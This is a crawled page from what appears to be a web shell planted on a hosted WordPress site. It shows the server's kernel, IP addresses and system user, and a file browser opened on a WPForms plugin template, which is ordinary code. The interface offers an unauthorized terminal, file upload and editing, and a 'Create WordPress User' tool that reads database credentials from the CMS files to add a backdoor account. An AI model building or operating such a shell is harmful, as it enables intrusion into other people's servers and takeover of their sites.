Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat.net.pl_backup
/
wp-content
/
plugins
/
wpforms-lite
/
lite
/
templates
/
admin
/
entries
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
overview
[目录]
drwxr-xr-x
2025-10-30 08:13
single
[目录]
drwxr-xr-x
2025-10-30 08:13
notice.php
798.00 B
-rw-r--r--
2025-10-30 08:13
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
notice.php
<?php /** * Sample data upsell notice. * * @since 1.8.9 * * @var string $btn_utm UTM link for the button. * @var string $link_utm UTM link for the text link. */ ?> <div class="wpforms-admin-content"> <div class="wpforms-sample-notification"> <div class="wpforms-sample-notification-content"> <h2>You’re Viewing Sample Data</h2> <p>Like what you see? <a href="<?php echo esc_url( $link_utm ); ?>">Upgrade to Pro</a> to get access to Entries and dozens of awesome features and addons!</p> </div> <p class="notice-buttons"> <a class="wpforms-btn wpforms-btn-orange wpforms-btn-md" href="<?php echo esc_url( $btn_utm ); ?>">Upgrade Now</a> </p> <a id="wpforms-hide-sample-data" href="#"><span class="dashicons dashicons-hidden"></span> Hide Sample Data</a> </div> </div>
关闭
保存